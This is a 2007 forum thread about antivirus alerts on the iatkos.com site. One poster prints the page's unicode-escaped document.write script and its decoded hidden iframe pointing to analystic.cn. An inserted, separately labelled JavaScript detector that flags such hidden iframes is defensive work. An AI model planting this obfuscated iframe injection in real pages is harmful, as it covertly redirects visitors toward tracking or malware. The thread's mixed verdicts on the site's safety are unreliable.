Full Version: Beware iatkos.com
SaintEpsilon
This is what Kaspersky told me when I tried checking out the link on uphuck.com

"Kaspersky Internet Security 7.0

The requested URL http://www.iatkos.com/ is infected with Trojan-Clicker.HTML.IFrame.bk virus"

Obviously I can't be sure, just using the forum to make people in the osx86 community aware of the potential danger.
InorganicMatter
Yep. My Clam-AV powered internet filter says:

The content filter has blocked the page that you have requested.

Web Site Address http://www.iatkos.com/
Description Virus or bad content detected. JS.Agent-6
~pcwiz
Uh oh. I visited that site but I didn't click on anything (I think). I'm going to contact Uphuck about this.

UPDATE: Just sent out an email and a PM to uphuck about this. I'm not going to visit the site till this is cleared up.
apowerr
Hopefully this wasn't intentional
~pcwiz
I don't think Uphuck would do something like that but it's a perfect target seeing as so many people are anticipating the release of iATKOS.
curlyboy
Trojan-Clicker.HTML.IFrame.bk virus is what I get also with ZoneAlarm Security Suite
~pcwiz
I can't find any info on this virus. Is it serious? I visited the site 2-3 times before but my protection (various firewalls, antivirus, antispyware) didn't detect anything. Maybe this is a recent threat.
jharleman
It's a trojan clicker....
Trojan Clickers (http://www.viruslist.com/en/virusesdescribed?chapter=153317864)
This family of Trojans redirects victim machines to specified websites or other Internet resources. Clickers either send the necessary commands to the browser or replace system files where standard Internet urls are stored (e.g. the 'hosts' file in MS Windows).

Clickers are used:

  • To raise the hit-count of a specific site for advertising purposes
  • To organize a DoS attack on a specified server or site
  • To lead the victim to an infected resource where the machine will be attacked by other malware (viruses or Trojans)
chris2k
Just read the source of the html and I think they got something to hide...

Quick analysis:

<script type="text/javascript">document.write('
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070
\u003a\u002f\u002f\u0061\u006e\u0061\u006c\u0079\u0073\u0074\u0069\u0063\u002e\u0063\u006e\u002f\u0069
\u006e\u002e\u0063\u0067\u0069\u003f\u0064\u0065\u0066\u0061\u0075\u006c\u0074\u0022\u0020\u0073\u0074
\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020
\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0020\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u0020
\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>

decoded to ascii gives you:

<iframe src="http://analystic.cn/in.cgi?default" style="visibility: hidden; display: none"></iframe>

Whatever that is...I can't tell. It redirects to google. Quite suspicious if you ask me...

regards,

chris
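Added example (not part of chris2k's post or of the thread): a static check in JavaScript (Node) that decodes \uXXXX-escaped document.write() strings without executing them and reports any hidden iframe they would emit. The function names and the sample page, including the tracker.example.invalid URL, are constructed for illustration.

```javascript
// Added example, not from the thread. decodeEscapes and findHiddenIframes are
// hypothetical helper names; the sample page below is constructed.

// Decode \uXXXX escapes as text; the script itself is never evaluated.
function decodeEscapes(s) {
  return s.replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Report every hidden <iframe> emitted by an escaped document.write() call.
function findHiddenIframes(html) {
  const findings = [];
  const writeCall = /document\.write(?:ln)?\s*\(\s*(['"])([\s\S]*?)\1\s*\)/g;
  for (const m of html.matchAll(writeCall)) {
    const raw = m[2].replace(/\r?\n/g, '');        // pasted copies wrap the literal
    if (!/\\u[0-9a-fA-F]{4}/.test(raw)) continue;  // plain markup is not the concern here
    const decoded = decodeEscapes(raw);
    for (const tag of decoded.matchAll(/<iframe\b[^>]*>/gi)) {
      const src = (/\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(tag[0]) || [])[1] || null;
      const hidden =
        /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag[0]) ||
        /\b(?:width|height)\s*=\s*["']?0\b/i.test(tag[0]);
      if (hidden) findings.push({ src, tag: tag[0] });
    }
  }
  return findings;
}

// Constructed sample: the escaped payload is generated here rather than typed out.
const toEscapes = (s) =>
  [...s].map((c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0')).join('');
const hiddenFrame =
  '<iframe src="http://tracker.example.invalid/in.cgi" ' +
  'style="visibility: hidden; display: none"></iframe>';
const samplePage = [
  '<html><body><h1>constructed page</h1>',
  `<script type="text/javascript">document.write('${toEscapes(hiddenFrame)}')</script>`,
  "<script>document.write('<p>plain, unescaped markup</p>')</script>",
  '</body></html>',
].join('\n');

// One finding: the escaped, hidden iframe. The plain document.write is ignored.
console.log(findHiddenIframes(samplePage));
```

The same check can be pointed at a saved copy of a page's source; a finding gives the iframe's src, which is the value to look up or block at the content filter.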
~pcwiz
Suspicious indeed. No more iatkos.com for me.
A Nonny Moose
QUOTE (InorganicMatter @ Dec 3 2007, 04:20 PM) *
Yep. my Clam-AV powered internet filter says:


Where is this filter? Or is it a part of ClamXAV that I don't know about?
InorganicMatter
QUOTE (A Nonny Moose @ Dec 4 2007, 06:08 PM) *
Where is this filter? Or is it a part of ClamXAV that I don't know about?



The latest version of ClarkConnect has got ClamAV virus scanning built into the web cache and content filter. It's a great piece of software, and the only real requirement is two network cards. I love it!
idividebyzero
This can happen when the webhost gets hacked/virused; the virus implants code on every page hosted by the server. The host needs to be alerted; there's really nothing the webmaster can do if it's a server-wide virus.
~pcwiz
Important Update:

After publishing this story in my blog, a user commented:

QUOTE
eskurza has said it was made with iWeb. This is one of the tags the iWeb will put into a site it builds. There is nothing malicious about it.


I don't know why iWeb would do this but I trust this person and I think it's pretty safe to say that iatkos.com is safe.
xtraa
Well, many AVs are hoaxing today because websites are getting more and more complex, especially if they put so much shi* in it like iWeb. (Nothing wrong with iWeb, this is just the downside of making it that easy.) So as long as you don't download or install an executable or plugin, it doesn't matter what AVs tell you.
(MoC)
IDK, I went there once. My AV didn't see anything.....
~pcwiz
Mine neither...I visited it on Windows XP SP2 w/ all patches and Firefox 2 latest release + AVG + Ad-aware 2007 + ZoneAlarm + Spybot & D + Windows Defender.

I have this whole ton of security stuff installed and none of them detected anything.
apowerr
QUOTE (~pcwiz @ Dec 10 2007, 09:25 PM) *
Mine neither...I visited it on Windows XP SP2 w/ all patches and Firefox 2 latest release + AVG + Ad-aware 2007 + ZoneAlarm + Spybot & D + Windows Defender.

Bloat rly?
Kane Adams
lol you guys are funny..
Use firefox.........
(MoC)
If you use IE7 you are cursed.........LMFAOROTFL

It wasn't bad; but it got bloated after 6.0!
tchow
Very funny. Maybe this guy brings the virus around the world. HA. HA. I wait two to three times a day. I have antivirus to protect my computer. I never get an alert from uphuck.com
chris2k
Never said it was a virus. Nor do I believe it's iWeb's fault, until someone can reproduce it.
The html/author is just trying to hide something. Might be a counter, might be something else.

http://isc.sans.org/diary.html?date=2004-07-23

The *method* is quite old actually.
~pcwiz
I just went on iatkos.com now and nothing happened. No viruses.

Whatever it is, I don't think it's a reason to be concerned.
Conroe Mac
I use special protection for viruses called Ubuntu.
fatshitcat
Actually, that "special protection" is the Linux kernel itself
chris2k
QUOTE (fatshitcat @ Dec 15 2007, 09:40 PM) *
Actually, that "special protection" is the Linux kernel itself


How can you expect an Ubuntu user to know what a kernel is?

...just kidding, don't want to start a distro war.
InorganicMatter
QUOTE (chris2k @ Dec 15 2007, 03:54 PM) *
How can you expect an Ubuntu user to know what a kernel is?


Gold.
~pcwiz
Guys another thing:

I checked out some other sites made using iWeb but they don't have that strange code in them. Maybe it's the theme or something...
(MoC)
There is...

Trust me, scripts are nuts...
EddM
This looks like something that has spread to a few other websites out there. I've been chasing a few domains I've found linked to this domain (analystic.in / .cn). Lots of redirecting to blank pages (though I assume something is happening server-side when these 'blank' pages are loaded).

It looks completely harmless. It's not a "virus", so I wouldn't go throwing that word around just because an AV catches it. It does look to be malicious in terms of how it got there, but I think it's just a script used for farming data (not even personally identifiable data, just demographics like your browser, etc). I may be wrong, but this is the only thing I can see that might even be possible with what it's doing.

I'll look into it a bit more because it is pretty interesting.